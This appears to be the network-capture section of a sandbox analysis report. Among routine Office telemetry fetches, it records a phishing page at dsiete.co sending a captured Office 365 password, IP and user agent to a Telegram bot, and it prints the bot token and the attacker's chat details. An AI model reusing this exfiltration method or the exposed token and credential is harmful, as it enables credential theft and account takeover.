                                            2024-12-03 08:57:58 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            46192.168.2.449795149.154.167.2204433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:59 UTC672OUTPOST /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: keep-alive
                                            Content-Length: 294
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            Accept: */*
                                            Content-Type: application/json
                                            cache-control: no-cache
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Origin: https://dsiete.co
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://dsiete.co/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:59 UTC294OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 35 39 34 37 33 33 39 38 37 36 2c 22 74 65 78 74 22 3a 22 3d 3d 3d 3d 3d 3d 20 4f cd 8f 33 cd 8f 36 cd 8f 35 cd 8f 20 52 cd 8f 65 cd 8f 73 cd 8f 75 cd 8f 6c cd 8f 74 cd 8f 20 3d 3d 3d 3d 3d 3d 5c 72 5c 6e 45 6d 61 69 6c 3a 20 5c 72 5c 6e 50 61 73 73 77 6f 72 64 31 3a 20 67 47 41 4d 36 65 41 4f 32 67 51 67 6d 38 49 5c 72 5c 6e 49 50 3a 20 68 74 74 70 73 3a 2f 2f 69 70 2d 61 70 69 2e 63 6f 6d 2f 38 2e 34 36 2e 31 32 33 2e 32 32 38 5c 72 5c 6e 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72
                                            Data Ascii: {"chat_id":5947339876,"text":"====== O365 Result ======\r\nEmail: \r\nPassword1: gGAM6eAO2gQgm8I\r\nIP: https://ip-api.com/8.46.123.228\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chr
                                            2024-12-03 08:58:00 UTC388INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 03 Dec 2024 08:57:59 GMT
                                            Content-Type: application/json
                                            Content-Length: 711
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2024-12-03 08:58:00 UTC711INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 37 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 33 38 35 31 38 36 30 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 77 69 7a 7a 7a 69 65 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 7a 7a 7a 69 65 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 39 34 37 33 33 39 38 37 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 2e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 57 69 7a 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 61 6d 6d 69 65 77 69 7a 7a 69 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 31 36 32 37 39 2c 22 74 65
                                            Data Ascii: {"ok":true,"result":{"message_id":9700,"from":{"id":6385186008,"is_bot":true,"first_name":"wizzzie_bot","username":"wizzzie_bot"},"chat":{"id":5947339876,"first_name":"S.","last_name":"Wiz","username":"sammiewizzie","type":"private"},"date":1733216279,"te


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            47192.168.2.44979713.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:59 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:00 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:59 GMT
                                            Content-Type: text/xml
                                            Content-Length: 415
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                            ETag: "0x8DC582B988EBD12"
                                            x-ms-request-id: e21e9151-601e-0097-6ab4-42f33a000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085759Z-174f7845968cdxdrhC1EWRg0en00000015rg000000001qp7
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:00 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            48192.168.2.44979613.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:59 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:00 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:59 GMT
                                            Content-Type: text/xml
                                            Content-Length: 499
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                            ETag: "0x8DC582B98CEC9F6"
                                            x-ms-request-id: f843b097-901e-00ac-53c3-43b69e000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085759Z-174f7845968psccphC1EWRuz9s0000001620000000000gbz
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:00 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            49192.168.2.44979913.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:59 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:00 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:00 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                            ETag: "0x8DC582BB32BB5CB"
                                            x-ms-request-id: e109cf1c-f01e-0096-3bf2-4410ef000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085800Z-174f7845968n2hr8hC1EWR9cag000000159g000000007ab0
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:00 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            50192.168.2.44979813.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:59 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:00 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:00 GMT
                                            Content-Type: text/xml
                                            Content-Length: 471
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                            ETag: "0x8DC582BB5815C4C"
                                            x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085800Z-174f7845968kvnqxhC1EWRmf3g0000000sh0000000003tkk
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:00 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            51192.168.2.44980013.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:00 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:00 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:00 GMT
                                            Content-Type: text/xml
                                            Content-Length: 494
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                            ETag: "0x8DC582BB8972972"
                                            x-ms-request-id: 7090c7f2-e01e-000c-3ea1-428e36000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085800Z-174f78459685m244hC1EWRgp2c00000015e0000000009b27
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:00 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            52192.168.2.449801149.154.167.2204433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:01 UTC401OUTGET /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:58:02 UTC346INHTTP/1.1 400 Bad Request
                                            Server: nginx/1.18.0
                                            Date: Tue, 03 Dec 2024 08:58:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 80
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2024-12-03 08:58:02 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                            Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            53192.168.2.44980313.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:01 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:02 UTC491INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:02 GMT
                                            Content-Type: text/xml
                                            Content-Length: 472
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                            ETag: "0x8DC582B9D43097E"
                                            x-ms-request-id: 5592fd3c-101e-005a-5def-44882b000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085802Z-174f7845968cdxdrhC1EWRg0en00000015q0000000003rmk
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            X-Cache-Info: L1_T2
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:02 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            54192.168.2.44980213.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:01 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:02 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:02 GMT
                                            Content-Type: text/xml
                                            Content-Length: 420
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                            ETag: "0x8DC582B9DAE3EC0"
                                            x-ms-request-id: 31ffcae5-e01e-003c-0df2-44c70b000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085802Z-174f7845968n2hr8hC1EWR9cag000000159000000000820v
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:02 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            55192.168.2.44980513.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:01 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:02 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:02 GMT
                                            Content-Type: text/xml
                                            Content-Length: 486
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                            ETag: "0x8DC582B92FCB436"
                                            x-ms-request-id: 716ae074-c01e-0046-576f-432db9000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085802Z-174f7845968j6t2phC1EWRcfe800000015z0000000000htq
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:58:02 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            56192.168.2.44980413.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:58:02 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:58:02 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:58:02 GMT
                                            Content-Type: text/xml
                                            Content-Length: 427
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                            ETag: "0x8DC582BA909FA21"
                                            x-ms-request-id: b5d3fb3c-c01e-000b-6fb4-42e255000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085802Z-174f7845968xlwnmhC1EWR0sv800000015p00000000006kk
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
